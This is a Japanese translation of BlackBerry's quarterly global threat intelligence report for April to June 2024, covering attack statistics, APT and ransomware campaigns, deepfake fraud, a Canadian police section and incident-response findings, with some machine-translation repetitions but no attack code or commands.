グローバル脅威インテリジェンス・レポート

2024年9月号

報告期間2024年4月1日~6月30日

重要な実用的インテリジェンス

本レポートは、お客様が組織の安全確保に積極的に活用できる実用的なインテリジェンスの提供に重点を置き、世界の脅威情勢を包括的にレビューしています。本レポートは4月から2024年6月までを対象としています。レポートのハイライトは以下の通りです:

BlackBerry®サイバーセキュリティ・ソリューションによって阻止されたユニークなマルウェアと攻撃は、それぞれ前報告期間から53 %と18% 増加している。BlackBerry 、毎日平均11,500以上のユニークなマルウェア・ハッシュが捕捉されている

詳しくは「クォータリー・アタック」をお読みいただきたい。

今四半期、重要インフラに対する攻撃は80万件を超え、その50 %が金融セクターを標的としていた。

サイバー脅威インテリジェンス(CTI)チームによる社内外の調査結果を「重要インフラ」セクションでご覧ください。

このサイクルでは営利企業が大きな標的となっており、停止した攻撃のうち66%が資本財を供給する企業に対するものだった。

これらの脅威については、営利企業のセクションをお読みください。

新しいセクション「Law Enforcement Limelight」では、カナダ全国サイバー犯罪調整センター(NC3)の調査結果を掲載し、これらのレポートに新たな側面を加えている。

カナダを標的としたランサムウェアの流行について続きを読む

 

この報告期間中、知名度の高い犯罪グループ(すなわちランサムウェアグループ)の多くが非常に活発に活動していた。これらのグループは、目的を達成するためにさまざまな複雑なツールを使用している。

脅威のアクターとツーリング」の続きを読む

サイバー脅威の状況は、最新の脆弱性を悪用するグループや、新しい、あるいは更新されたマルウェア・ファミリーを利用するグループの渦の中にある。

すべての主要なオペレーティング・システムでトレンドとなっている脅威については、「一般的な脅威」のセクションをお読みください。

悪意のある情報窃取者(別名インフォステーラー)は、貴重な情報や認証情報を流出させるために、脅威行為者によって利用される顕著な武器である。

CylanceMDRObservationsセクションにある流出ツールに関する我々の見解をお読みください。

地政学的分析では、巧妙なサイバー脅威の増加がサイバーセキュリティ教育の強化の必要性をいかに強調しているかを考察している。

BlackBerry 、マレーシア初のサイバーセキュリティ・センター・オブ・エクセレンス(CCoE)でサイバー教育にどのように投資しているかをご覧ください。

目次

BlackBerry®Global Threat Intelligence Report は、CISO やその他の重要な意思決定者に、各業界や地域に影響を及ぼす最新のサイバーセキュリティの脅威や課題について情報を提供することを目的として、定期的に発行されています。2024年、世界各地でさまざまな極論をめぐる地政学的な動揺が見られました。これは、利益のため、危害を加えるため、あるいは単に混乱を助長するために人間の混乱を利用する悪意のある行為者や日和見的なサイバー脅威グループを活気づけています。このような脅威に対抗するため、BlackBerry は、世界中のあらゆる規模、幅広い業種の組織に不可欠なサイバーセキュリティ・サービスを提供しています。

今期のサイバー攻撃総件数

2024年4月から6月にかけて、BlackBerry サイバーセキュリティ・ソリューションは370万件のサイバー攻撃を阻止した。これは、1日当たり43,500件以上のサイバー攻撃を阻止したことになり、2024年1月から3月までの前回の報告期間よりも18%増加しています。

また、当社の顧客基盤を標的としたマルウェアの ユニーク サンプル数は、1日 平均11,500件 で、前回のレポートから 53%増加しました。これは、Global Threat Intelligence レポートを開始して以来、前四半期比で最も高い増加率の 1 つです。バイナリのハッシュを変更したり、独自のペイロードを生成したりすることは、熟練した脅威行為者にとっては複雑なことではありませんが、「攻撃を阻止」した件数と「独自のハッシュ」の件数が異常に多いことは重要です。これは、マルウェアの開発者が、回復力を高めるためにコードを迅速に更新し、適応させていることを示しています。新しいマルウェアが順応し、既存のマルウェアファミリが能力を増し、敵対者がより高度な戦術を急速に採用していることを、生の数字が示唆しています。その結果、難読化、巧妙化、回避技術が強化され、より強力なマルウェアが生み出されることになります。

BlackBerry は、サイバー犯罪者がサイバーセキュリティ・システムを迂回する努力を行っている中、マルウェア・ファミリーの改変を積極的に監視し、特定しています。本レポートでは、当社の脅威リサーチ・インテリジェンス・チームによる最新の調査結果をご覧いただくとともに、現在どのようなグループが各タイプのマルウェアを使用しているかを知り、これらのタイプの脅威に対する戦略的サイバー防御に関する当社の推奨事項をご確認いただけます。

お気づきのように、攻撃の総数と ユニーク ハッシュ(新しいマルウェア)の数は必ずしも相関しません。次のセクションの図2から図9が示すように、すべてのサイバー攻撃がユニークなマルウェアを使用しているわけではありません。攻撃者の動機、攻撃の複雑さ、包括的な目標(スパイ活動、金銭的利益、ターゲットへの一般的な被害の発生など)によって異なります。

図1: 1分間に遭遇したマルウェアのハッシュ数(2023年3月~2024年6月)。
(*このレポートは120日サイクルをカバーしています。他のレポートはおおよそ90日周期)

国別サイバー攻撃総数

攻撃を阻止

米国のBlackBerry ソリューションを利用する組織は、今回のサイクルで最も多くの攻撃を受けた。米国以外では、韓国、日本、オーストラリア、ニュージーランドも高いレベルの攻撃を受け、トップ5にランクインし、アジア太平洋地域(APAC)が2番目に標的の多い地域となりました。

BlackBerry の関与が強まっているAPAC地域では、地政学的緊張がサイバー動向に影響を与え続けている。重要なインフラ、サプライチェーン、企業に対する国家主導および非国家主導のサイバー攻撃は増加の一途をたどっている。組織は、サイバースパイ、盗聴、ランサムウェア、フィッシング攻撃など、数多くの脅威からますます狙われるようになっている。サプライチェーンや組織の回復力を高めるためには、インフラ、データ、デバイス、通信の保護に注意を払い、警戒を強める必要がある。

図2は、BlackBerry サイバーセキュリティ・ソリューションが最も多くのサイバー攻撃を阻止し、悪意のあるバイナリの大半を受け取った上位5カ国を示している。

図2:2024年4月から6月までの、最も多くの攻撃を阻止した国とユニーク・ハッシュ数のランキング。

ユニークなマルウェア

今期のサイバー攻撃総件数」のセクションに記載されているように、BlackBerry 、当社の顧客ベースを標的とした1日平均11,500件の 新規 ハッシュ (ユニークなマルウェア)が観測され、前回のレポートから53%増加しました。これは、定期レポートを開始して以来、前四半期比で最も高い増加率の1つです。このユニークマルウェアの増加には多くの要因があります。1つは、複数の従業員が騙されることを期待して、標的型フィッシングメールや企業特有の誘い文句で従業員全体の電子メールリストを狙うなど、マクロレベルでの標的型攻撃の増加です。

図 2 が示すように、米国、日本、韓国、オーストラリアは、前期のレポートと同様、依然として上位を占めています。図 2 が示すとおり、米国、日本、韓国、オーストラリアは、前期のレポートと同様、依然として上位を占めています。また、カナダは現在、ユニーク・マルウェアの感染国として第5位となっています。

結果比較

今期の結果を前回のレポートと比較すると、攻撃の阻止数と遭遇したマルウェアのユニークハッシュ数の両方で、上位4カ国は比較的変わっていません。しかし、悪意のあるハッシュの数では、日本が APAC 諸国の隣国を上回りました。図2が示すように、米国、日本、韓国、オーストラリアは、前期のレポートと同様、依然として上位にランクインしています。図 2 が示すように、米国、日本、韓国、オーストラリアは、前期のレポートと同様、依然として上位にランクインしています。また、カナダは現在、ユニーク・マルウェアの感染国として第5位となっています。
図3:前回(2024年1月~3月)と比較した、本レポート(2024年4月~6月)における総攻撃阻止数とユニークハッシュ数の順位変動。

サイバーストーリーハイライトAPACにおけるスパイ活動

トランスペアレント・トライブ社、クロスプラットフォームのプログラミング言語を活用し、インド政府、防衛、航空宇宙セクターを狙う

最新の取り組みとして、BlackBerry の研究者は、インドの政府、防衛、航空宇宙分野を標的とするパキスタンの高度持続的脅威(APT)グループ、Transparent Tribe を特定した。2013年以来サイバースパイ活動を行っていることで知られるこのグループは、PythonやGolangなどのクロスプラットフォーム言語を使用し、TelegramやDiscordなどのウェブサービスを悪用しています。最近のキャンペーンには、インドのベンガルール(旧バンガロール)の主要な航空宇宙関係者を狙ったスピアフィッシング・メールが含まれる。Transparent Tribeは、その出自を隠そうとしていたにもかかわらず、その手口やツールは、彼らのものであることを示していた。 

産業別サイバー攻撃

BlackBerry は、業界セクターを重要インフラと商業企業の 2 つに大別している。BlackBerry'sの重要インフラの遠隔測定と統計は、Cybersecurity and Infrastructure Security Agency (CISA)によって重要インフラと定義された16セクターの顧客から得られている。これらのセクターには、医療、政府、エネルギー、農業、金融、防衛が含まれる。営利企業内の事業体は、商品やサービスの生産、流通、販売に従事している。これらの企業は、製造業、小売業、サービス業など様々な分野で事業を展開している。

図4:2024年4月から6月までに停止した業界別攻撃とユニーク・ハッシュ。

重要インフラ

重要インフラは、サイバー犯罪者にとって有利な標的である。このデータは非常に貴重であることが多く、他の脅威グループに転売されたり、攻撃計画に利用されたり、あるいはスパイ活動に利用されることもあります。重要インフラを標的とする脅威者は、バックアップからの復元に時間をかけるよりも身代金を支払うことを組織が好む可能性があるため、攻撃でランサムウェアを使用することに頼るかもしれない。ヘルスケアのような重要なサービスを提供する組織にとっては時間が最も重要であり、脅威行為者はこのことを十分に理解している。

今年は、地政学的な混乱により、重要インフラが、その国の政策に反対する敵対勢力や、その国の政策に協力する敵対勢力の標的となった。このため、脅威グループや国家スポンサーは、特に重要インフラを標的とするようになる。

重要インフラのデジタル化が進むにつれ、この分野は近年、サイバー犯罪者にとってさらに脆弱なものとなっている。脅威者は、システムの設定ミスやパッチが適用されていないレガシーシステムなどの脆弱性を攻撃したり、従業員に対して実施されるソーシャルエンジニアリングキャンペーンを通じてシステムに侵入しようとするなど、重要システムを積極的に悪用している。

2024年4月から6月までの期間において、 CylanceENDPOINTおよびその他のBlackBerry サイバーセキュリティ・ソリューションは、重要インフラ産業部門の組織に対する80万件以上の攻撃を阻止しましたこれらの攻撃のほぼ半数は金融セクターの企業に対するものであり、前期比で10%増加しています。一方、政府および公共セクターの組織は、ユニーク・ハッシュの45%以上を集め、最も多様な攻撃を経験しています。

また、BlackBerry のサイバーセキュリティ・ソリューションが遭遇した業界固有のサイバー攻撃の41%は重要インフラに対するものであった。

図5:2024年4月から6月までの、セクター別の重要インフラ攻撃阻止数とユニークマルウェア数。
図6:今四半期、重要インフラ全体で最も注目された内部脅威。

サイバーストーリーハイライト重要インフラに対する脅威

サイドワインダー、地中海の港湾・海上施設をターゲットに新たな流通インフラを活用

2024年7月、BlackBerry Threat Research and Intelligence Teamは、SideWinderとして知られる脅威グループによる新たなキャンペーンを発見しました。Razor Tiger、Rattlesnake、T-APT-04としても知られるSideWinderグループは、少なくとも2012年から活動しています。同グループはこれまで、パキスタン、アフガニスタン、中国、ネパールに特に焦点を当て、軍事、政府、企業を標的としていることが確認されている。SideWinderは通常、電子メールのスピアフィッシング、ドキュメントの悪用、DLLのサイドローディングのテクニックを使用して検出を回避し、標的型インプラントを配信します。

このキャンペーンでは、BlackBerry 、非常に特定のポートインフラに関連する3つの偽装された「視覚的おとり」文書を観測した。ビジュアル・デコイは通常、それ自体に悪意があるわけではなく、その主な目的は、被害者が危険にさらされていることに気づかせないように注意をそらすことです。被害者は通常、標的企業の従業員です。以下は、SideWinderの最新キャンペーンの例です:

図7:サイドワインダーが最新のキャンペーンで使用したビジュアルベイト・ドキュメント。
図7:サイドワインダーが最新のキャンペーンで使用したビジュアルベイト・ドキュメント。

脅威行為者は、被害者が視覚的な餌となる文書を開いて読むよう誘惑するために、さまざまな手口を使う:

  • 攻撃者は、受信者が仕事や業界の関係でよく知っていると思われる合法的な組織の本物のロゴをコピーします。上の図7では、攻撃者がエジプトの紅海港湾局(Red Sea Ports Authority)のロゴを悪用しています。
  • 文書の見出しは、受信者に最大限の不安を与えるように設計されています。上記の例の見出し(「EMPLOYEE TERMINATION AND SALARY CUT NOTICE」)は、従業員に仕事と家計の安全を心配させることを意図しています。
  • 上記のサンプルでは、本文中に「手元資金をほとんど使い果たした」、「深刻な懸念」、「雇用を打ち切る」といった感情的な表現が含まれていることに注意してください。これらのフレーズは太字で書式設定されているため、読者の目にすぐに留まります。

脅威を仕掛ける側は、親しみのある企業のロゴを使用し、恐怖や仕事の安全への懸念といった強い感情を引き出すことで、被害者が文書を正当なものだと信じ、強い不安の中で文書を読まざるを得なくなることを期待しています。そうすると、被害者は注意力が散漫になり、システムのポップアップやCPU使用率の高さによるファンノイズの増加など、デバイス上の奇妙な現象に気づかなくなる。

調査中に明らかになったデータを分析した結果、サイドワインダーの新たなキャンペーンはインド洋と地中海の港湾と海上施設を標的としていると、中程度の確信を持って結論づけました。サイドワインダーの過去のキャンペーンから、この新しいキャンペーンの目的はスパイ活動と情報収集であると我々は考えている。BlackBerry ブログで全文を読む。

重要インフラ外部からの脅威

BlackBerry また、外部の脅威、つまり外部組織から報告された脅威で、必ずしもBlackBerryのテナントで発見されたものではないものについても、綿密に追跡している。この期間中、政府機関、業界報道機関などの外部グループから、重要インフラに対する攻撃が世界中で多数報告された。

3月最後の数日間、インドの様々な政府機関やエネルギー・セクターが、フリーで利用可能な情報窃取ツールHackBrowserDataのカスタマイズされた亜種に感染したというニュースが流れた。感染経路としてフィッシングメールを利用し、流出経路としてSlackチャンネルを利用したこの未知の脅威者は、従業員の詳細情報や財務記録を含む8.8GBの機密データを盗み出しました。

テキサス州に本社を置く通信会社フロンティア・コミュニケーションズは4月、米国証券取引委員会(SEC)に、4月14日に情報漏洩を検知し、復旧のためにシステムの一部を停止せざるを得なかったことを報告した。未知の脅威者は、個人を特定できる情報を含む機密データにアクセスすることができた。

また4月には、ウクライナのコンピュータ緊急対応チーム(CERT-UA)が、ロシアが支援したとされるグループ「サンドワーム」による、戦乱の国内にあるさまざまな重要インフラ事業体への攻撃計画を報告した。この計画は、水やエネルギーを含む様々な重要インフラ部門にわたる約20の事業体を標的としていた。サンドワームによるウクライナの重要インフラへの攻撃の歴史は長く、ロシアとウクライナの戦争が続く中、今後も続くと思われる。

5月の第1週は、親ロシア派によるハクティビストの脅威が続いているとして、英国のナショナル・サイバー・セキュリティ・センターおよびカナダのサイバーセキュリティ・センター(CCCS)と共同で、米国の複数の機関から勧告が出された。ハクティビストは、水、エネルギー、ダム、農業など、インターネットに接続された重要インフラを標的としていた。彼らの活動は、ヨーロッパと北米の重要インフラ部門のインターネットに面した運用技術(OT)システムに焦点を当てていた。

5月初旬、BlackBastaランサムウェアの運営者は、全米18州に約140の病院を持つ非営利の大手カトリック系医療機関を標的にした。そして6月初旬、BlackBastaはメリーランド州に拠点を置くバイオテクノロジー企業Elutiaから550GBのデータを盗み出した。データには従業員情報や財務情報が含まれていた。

ヘルスケアを標的にしたランサムウェア集団はBlackBastaだけではなかった。6月下旬、BlackSuitランサムウェアグループが南アフリカのNational Health Laboratory Service(NHLS)とその265のラボに侵入した。BlackSuitは、攻撃的で危険なランサムウェア集団Contiの派生型と考えられている。BlackSuitの侵入は、サル痘(mpox)の流行と重なり、NHLSのシステムに大きな影響を与えました。脅威者はバックアップを含むNHLSシステムの一部を削除しましたが、機密性の高い患者データが失われたことは報告されていません。

これらの攻撃や前四半期中の他の攻撃は、重要なインフラ、特に医療セクターを標的とするランサムウェアの運営者が依然として根強い問題であることを示している。

民間企業

この報告期間中、営利企業に対する内部脅威も大幅に増加した。BlackBerry のサイバーセキュリティが阻止した攻撃の数(110万件)は、前回の報告と比べて60%増加した。

民間企業部門では、資本財部門に対する攻撃が大幅に増加していることが確認された。消費財とは異なり、資本財には、営利企業や重要なインフラを通して様々な産業に不可欠な機械、工具、設備が含まれます。これらの資産を標的にすることは、企業のデジタルおよび物理的なサプライチェーンに影響を与える可能性があります。

図8:2024年4月から6月までの部門別、営利企業に関連する攻撃の阻止数とユニークマルウェア数。
図9:2024年4月から6月までの営利企業に対する内部脅威のトップ。

営利企業外部からの脅威

4月上旬、IxMetro PowerHostは、流出したLockBit 3.0のソースコードを使用したとされる比較的新しいランサムウェア集団SEXiによるサイバー攻撃を受けました。このグループは組織のVMware ESXiサーバーとバックアップを標的にし、チリのIxMetro PowerHostのサービスに大きな混乱をもたらした。

また、4月には中国のショッピングプラットフォーム「パンダバイ」が不正アクセスを受け、130万人以上の顧客データがネット上に流出した。Pandabuyは、ユーザーが他の中国のeコマース・プラットフォームから商品を購入することを可能にしている。Sanggieroとして知られる脅威行為者は、この攻撃の責任を主張し、プラットフォームのAPI内の重要なサーバーの脆弱性を悪用し、小売業者の内部サービスにアクセスしたと述べた。Eコマース小売業者は当初、データ流出を防ぐために要求を支払った疑いがある。しかし、2024年6月、同じ脅威行為者が再び中国ベースのプラットフォームを悪用し、恐喝したと主張している。

5月上旬、大手多国籍テクノロジー企業が、約5,000万人に影響する大規模なデータ漏洩を顧客に警告した。このテクノロジー企業は、財務情報の漏洩がなかったことを確認したものの、顧客の氏名や住所など、個人を特定できる情報(PII)が流出したことを明らかにした。にもかかわらず、このテクノロジー企業は、盗まれたデータが非金融的なものであるため、情報漏洩の潜在的な影響を軽視している。

今年5月、脅威グループShinyHuntersが多国籍エンターテイメントチケット販売・流通会社に侵入し、5億6,000万人以上の顧客データを盗み出した。データには、氏名、住所、電子メールなどの個人情報、ハッシュ化されたクレジットカード情報が含まれていた。影響を受けたユーザーには郵送で通知された。

6月、アメリカの多国籍ソフトウェア会社がランサムウェア攻撃による大規模な機能停止に見舞われ、北米の数千の自動車ディーラーの業務に影響を与えた。この障害は、1万5,000カ所以上に及ぶディーラーの自動車販売や修理など、あらゆる活動に影響を及ぼした。ランサムウェアグループのBlackSuitがこの攻撃の責任を主張し、身代金として約2500万米ドルの暗号通貨を要求した。同組織はシステムを復旧させるために身代金を支払ったとされている。

6月下旬、北米を拠点とするソフトウェア・サービス会社TeamViewerは、多発するAPTグループCozy Bear(別名APT29)が同社の企業ITシステムを攻撃したことを確認した。Cozy Bearはロシアを拠点とするハッキンググループで、ロシアの対外情報庁に所属しているとされている。同グループは、2020年のSolarWindsの侵害を含め、長年にわたって複数の攻撃や悪用を行なってきた。TeamViewerは声明を発表し、漏洩したのは従業員のアカウントデータのみで、Cozy Bearが本番環境や顧客データにアクセスした形跡はないと主張した。

サイバーストーリーハイライト営利企業に対するディープフェイク

従業員の警戒:ディープフェイク詐欺に対する防御の第一線

ディープフェイクの写真、動画、「ディープボイス」音声が、サイバーセキュリティでますます問題になっている。ディープフェイクとは、生成人工知能(AI)を使用して作成されたデジタル操作されたメディアのことで、最も一般的な使用例は「フェイススワップ」(ある人物の顔を別の人物にデジタル的に重ね合わせること)である。ディープフェイク・メディアは多くの場合、非常にリアルで説得力があり、フィッシング詐欺、偽の電話、さらには受信者に上司など別の従業員から正当な依頼を受けていると思わせることを意図した偽のビデオ通話など、幅広い攻撃で使用するために悪意のある行為者によって武器化される可能性がある。

2017年後半にディープフェイクを作成する最初のアプリがRedditユーザーによって立ち上げられて以来、ディープフェイクは電光石火の速さで進化し、従業員を騙してログイン認証情報、財務記録や顧客記録を攻撃者に提供させ、さらには数百万ドルの会社資金を詐欺師に送金させるという恐ろしいほど効果的なものになっている。

最近の事件では、自動車メーカーのフェラーリが高額なディープフェイク詐欺から逃れた。ある幹部が、CEOのベネデット・ヴィーニャになりすました人物から不審な電話を受けた。詐欺師のアクセントや口調は本物のCEOとほとんど同じだったが、その幹部は、見慣れない電話番号の使用やメッセージの緊急性といった赤信号に気づいた。

電話の主の身元を確認するため、幹部は推薦図書について具体的な質問をした。詐欺師が答えられないと、電話を切った。この重役の機転が災難を回避し、フェラーリは通信の安全性を確保するために社内調査を開始した。

この事件は、会社を詐欺から守るために従業員が果たす重要な役割を浮き彫りにしている。ほぼすべてのディープフェイク攻撃の重要な構成要素は、ソーシャル・エンジニアリングである。脅威者は、従業員が企業のセキュリティ境界の最も弱いリンクであると想定し、ターゲットの信頼を得るために心理操作のテクニックを使う。通常とは異なる要求、特に金銭や機密情報の授受を伴う要求に対して、警戒心を保ち、疑心暗鬼になっている従業員に賞賛を送りたい。彼らの意識と迅速な行動が、企業を大きな金銭的損失と風評被害から救うことができる。 

企業は、詐欺師が「偽」の電話/ビデオ通話、電子メール、テキストの背後にいるかもしれないことを示す赤信号について従業員を教育することによって、セキュリティを向上させることができます。まずは、日々巧妙な脅威から組織を守ってくれている縁の下の力持ちを称え、支援することから始めましょう。この逸話を同僚や同僚と共有してください。何かおかしいと思ったら、自分の直感を信じて、要求者の身元を確認する二次的な方法を見つけるよう、彼らに思い出させるのだ。

ディープフェイクの詳細については、当社のホワイトペーパーをお読みください、 ディープフェイクの正体を暴く:増大する脅威の背後にあるテクノロジーとテクニック.

地政学的分析とコメント

世界中の政府は、テクノロジーが地政学的対立の原動力となっている事実をますます明確に認識するようになっている。2024年5月6日、カリフォルニア州サンフランシスコで開催されたRSAカンファレンスでの講演で、アントニー・J・ブリンケン米国務長官は、各国が欧米か中国の技術スタックを採用せざるを得ないゼロサム競争の入り口にある世界について述べた。ブリンケン長官のサイバースペース・デジタル政策担当大使であるナサニエル・C・フィックは、「国際秩序は、どちらのOSが支配的であるかによって定義されるだろう」と述べた。

ジェネレーティブAIのような技術がかつてないスピードで進歩していることから、高度なデジタル技術の「責任ある」利用を求める活動が活発化している。AIのようなテクノロジーは、経済成長を促進し、社会を変革し、世界で最も困難な問題(気候変動、不平等、疾病など)に取り組む大きな可能性を秘めている一方で、特に人々が日々依存している重要なインフラやサービスにリスクが顕在化した場合、大きな影響を及ぼすリスクももたらす

本レポートで強調されているように、国家に支援されたグループを含むサイバー犯罪者が、重要インフラを標的にするケースが増加している。サービスを妨害したり、重要インフラの運営者や所有者に身代金を要求したりする悪意や犯罪的意図のある事件は、過去数年間で世界的に急増している。この報告期間中、BlackBerry は重要インフラに対する80万件以上の攻撃を記録しており、その50%が金融セクターを標的としている。加害者は、これらのサービスの重要性を認識しており、これらのサービスに最大限の混乱を引き起こそうとしたり、引き起こすと脅したりすることで、身代金を引き出す努力を最大化しようとしている。

オリンピックやFIFAワールドカップなどの主要な国際スポーツイベントも、サイバー脅威の焦点となっている。悪質なサイバー活動が劇的に増加することを見越して、カナダのサイバーセキュリティセンターは2024年5月にサイバー脅威速報を発表し、「サイバー犯罪者は、ビジネスメールの漏洩やランサムウェア攻撃を通じて、主要な国際スポーツイベントに関連する大規模組織や主要スポーツイベント周辺の地元企業を標的にする可能性が非常に高い」と評価している。また、これらのイベントを攻撃のおびき寄せるフィッシングメールや悪意のあるウェブサイトに注意するよう、参加者や観客に警告している。

実際、オリンピック終了後、フランス当局は2024年オリンピックに関連した140件以上のサイバー攻撃を報告したが、そのすべてが "低影響 "であった。しかし、過去のオリンピックの傾向からすると、この数字は過小評価である可能性が高い。例えば、2021年に開催された東京オリンピックでは、主催者は4億5000万件のサイバー攻撃を報告している。

世界経済フォーラム(WEF)が「グローバル・サイバーセキュリティ・アウトルック2024」で指摘しているように、政府と企業は、大規模な混乱を引き起こす可能性のある、急速にエスカレートし巧妙化するサイバー脅威に対するサイバー耐性を維持するのに苦慮している。さらに、組織が自らを守る能力には大きな隔たりがある。WEFによると、従業員10万人以上の組織の85%がサイバー保険に加入しているのに対し、従業員250人未満の組織でサイバー保険に加入しているのは21%に満たない。全体として、最小規模の組織は、「最低限重要な業務要件を満たすために必要なサイバー耐性を欠いていると回答する確率が、最大規模の組織の2倍以上」である。大規模組織と小規模組織の間のこの不均衡に対処する必要がある。

法執行ライムライト

今回のGlobal Threat Intelligence Reportを皮切りに、BlackBerry 、カナダ王立騎馬警察のNational Cybercrime Coordination Centre(NC3)と協力し、サイバー犯罪の傾向に関する法執行機関からの重要な洞察を紹介しています。これは、BlackBerry がサイバーセキュリティに関する官民の協力関係を改善するために、世界中の法執行機関と協力している一例に過ぎません。
法執行ライムライト
サイバー犯罪は世界的な最重要脅威として認識されており、法執行機関にとってユニークな課題となっている。物理的な世界で行われる犯罪とは異なり、サイバー犯罪は多くの場合国境がなく、加害者、被害者、インフラは、国際的なものも含め、異なる管轄区域に存在するのが一般的である。世界的な警察組織が存在しないため、世界中の法執行機関がサイバー犯罪への対応を調整するためのプロセスを開発し、国際的な協力を行う必要がある。

法執行能力の強化NC3の専門サポート

国家サイバー犯罪調整センター(NC3)は、カナダの2018年国家サイバーセキュリティ戦略を受けて2020年に設立された。カナダ王立騎馬警察(Royal Canadian Mounted Police)の管理の下、この国家警察サービスは、カナダにおけるサイバー犯罪による脅威、影響、被害の軽減を支援することを義務付けられている。NC3は、カナダの全警察機関に専門的なサポートを提供し、多様なスキルを持つ警察官と民間人のスタッフを雇用して、高度な犯罪を効果的に分析するために必要な捜査と技術的専門知識を提供している。NC3は、以下のような法執行パートナーを支援する専門サービスを提供している:

  • サイバー犯罪情報
  • 技術的アドバイスとガイダンス
  • ツール開発
  • 行動分析
  • 暗号通貨のトレース

NC3は、国内外の法執行機関、政府パートナー、民間企業、学界と緊密に協力し、サイバー犯罪に対するカナダの法執行機関の対応を継続的に改善している。

ランサムウェアの蔓延

国レベルのサイバー犯罪データにアクセスできるNC3は、新たなサイバー犯罪の傾向を定期的に評価し、捜査の優先順位に役立てるとともに、サイバー犯罪のエコシステムをよりよく理解している。NC3は、オープンソースの報告書を利用して、その情報を強化している。ランサムウェアは、NC3に報告されたインシデントのほぼ60%がランサムウェア攻撃であることから、カナダにおけるサイバー犯罪の脅威のトップであると評価されています。ランサムウェアの運営者はあらゆる部門や組織を標的にしているため、どの組織も無縁ではいられないが、カナダでは中小企業(SMB)が特に魅力的な標的となっている。

カナダにおけるランサムウェアの脅威トップ

NC3は、カナダにおけるランサムウェアの脅威の上位を特定するために定期的な評価を行っている。最新の評価では、2024年1月1日から2024年4月30日までのインシデントを対象としています。下図は、この期間におけるランサムウェアの脅威トップ10を示しています。

ランサムウェアが蔓延しているにもかかわらず、ほとんどのサイバー犯罪は報告されていない。カナダの法執行機関に報告されるサイバー犯罪は、わずか10%程度と推定されている。この報告不足により、この国におけるサイバー犯罪の蔓延と影響を完全に理解することは困難である。

図10:カナダに影響を与えたNC3のランサムウェアの上位発見(2024年1月~4月)。

報道されない犯罪

サイバー犯罪の真の範囲と影響について包括的な理解を得るためには、報告不足という広範な問題に取り組むことが極めて重要である。正確な報告は、NC3のような法執行機関の効果的な対応能力を高めるだけでなく、戦略的対策の基盤を強化する。官民の協力体制を強化することで、報告におけるギャップを埋め、進化し続けるサイバー犯罪の脅威に対して、より強靭な防御を構築することができる。
図3:前回(2024年1月~3月)と比較した、本レポート(2024年4月~6月)における総攻撃阻止数とユニークハッシュ数の順位変動。

サイバーストーリーハイライトランサムウェアが空を飛ぶ

Akiraランサムウェア、LATAM航空業界を標的に

2024年6月、BlackBerry の研究者は、ラテンアメリカの航空会社に対するAkiraランサムウェアを使用したStorm-1567による攻撃を調査しました。二重の恐喝戦術で知られるこの財政的な暴力団は、最初にSSH経由でネットワークにアクセスし、Akiraを展開する前に重要なデータを流出させました。時代遅れのシステムを悪用し、正規のソフトウェアを悪用することで有名なStorm-1567は、世界中の中小企業を標的としており、2024年1月の時点で250以上の組織をターゲットにし、4200万ドル以上の身代金を集めています。

インシデントレスポンスの分析とコメント

BlackBerry インシデントレスポンス(IR)チームは、最初の感染経路がインターネットに接続されたデバイスであるインシデントを定期的に監視している。設定ミスのデバイスや工場出荷時のパスワードが設定されているデバイスなど、脆弱なデバイスに対するサイバー攻撃はよくあることです。過重労働にあえぐ企業のセキュリティ・チームは、すべてのインターネット・デバイス(ネットワーク・プリンターやノート型ウェブ・カメラなど)のセキュリティを十分に確保できていないことが多い。さらに、ネットワーク・アプライアンスやファイアウォール・アプライアンスなど、ますます重要な機能がデバイスに組み込まれるようになっている。

今四半期、IR チームは Cisco Adaptive Security Appliance (ASA) の古いバージョンと Palo Alto Networks PAN-OS ソフトウェアを搭載したデバイスに脆弱性を発見しました。保護されていない、あるいは設定が不十分なインターネット・デバイスは、サイバー窃盗犯がランサムウェアを企業環境に展開し、データを流出させる可能性があります。このことから、企業はインターネットに露出したすべてのシステムにセキュリティ・アップデートを適用し、タイムリーに実施する必要があることが浮き彫りになりました。(MITRE - 外部リモートサービス)

同チームは、不正アクセス者が会社のクラウドリソースにアクセスするインシデントを複数確認した。以下に詳述する最近の2つの状況は、定期的なシステム・アップデートと強固なネットワーク・セキュリティ対策の重要性を浮き彫りにしている。

  • インシデント1:サイバーセキュリティ侵害の際、脅威者は古いCisco ASAの一連の脆弱性を悪用し、会社の仮想プライベートネットワーク(VPN)に不正アクセスした。ネットワーク内に侵入すると、Microsoft Remote Desktop Protocol(RDP)を利用してドメイン・コントローラに侵入し、ドメイン内のユーザーとグループの包括的なリストを取得しました。netscanやAdvanced IP Scannerソフトウェアなどのツールを活用し、徹底的なネットワーク・スキャンを行い、インフラストラクチャをマッピングしました。その後、攻撃者は、重要なユーザーデータを含む「C:˶Users」フォルダをすべて流出させた後、Akiraランサムウェアを展開し、重大な混乱とデータ損失を引き起こしました。
  • インシデント2:あるクライアントが、ドメイン・コントローラから不正アクセスを知らせるセキュリティ・アラートを受信した。調査の結果、脅威者は旧式の使用済みCisco ASAアプライアンスの脆弱性を悪用してネットワークに侵入していたことが判明しました。侵入後、攻撃者はBlackSuitランサムウェアを展開し、顧客の業務に大きな混乱をもたらしました。

これらのインシデントは、企業がすべてのシステムに強力な認証セキュリティ管理を導入する必要性を浮き彫りにしている。(MITRE - 有効なアカウント:クラウド・アカウント)

図11:インシデント対応の上位シナリオ(2024年4月~6月)。

サイバーストーリーハイライト大規模データ漏えいにより29億件の記録が流出

米国、英国、カナダの市民から4テラバイトの極めて個人的なデータが盗まれた。

4月、悪名高いアンダーグラウンドのサイバー犯罪サイト『BreachForums』に、"米国、カリフォルニア州、英国の全人口 "の個人記録が流出した疑いがあるというスレッドが投稿された。この投稿では、4テラバイトのデータが盗まれたと主張し、アメリカ市民やイギリス、カナダの人々のフルネーム、住所、電話番号、さらには社会保障番号(SSN)のような非常に機密性の高いPIIで構成されていた。

USDoDとして知られる脅威行為者は、29億行以上のレコードを盗んだと主張し、この大規模なデータセットの流出情報に対して350万米ドルという多額の料金を要求した。

この身代金要求は最終的に失敗に終わり、7月に4テラバイトのデータがBreachForumsを通じて無料で公開された。その内容は、1億3700万件以上の電子メールアドレス、2億7200万件のSSNなどであった。流出の原因は、データ・ブローカーおよび身元調査サービスNational Public Data(NPD)の子会社サイトであるRecordsCheck.netに関連すると考えられている。RecordsCheck.netは、バックエンド・データベースのパスワードを、ホームページから自由に利用できる平文ファイルで不注意にも公開していた

NPDは正式な声明で、2023年後半に記録にアクセスしようとした試みがあったことを認めたが、影響を受けた可能性のある記録の範囲については言及しなかった。

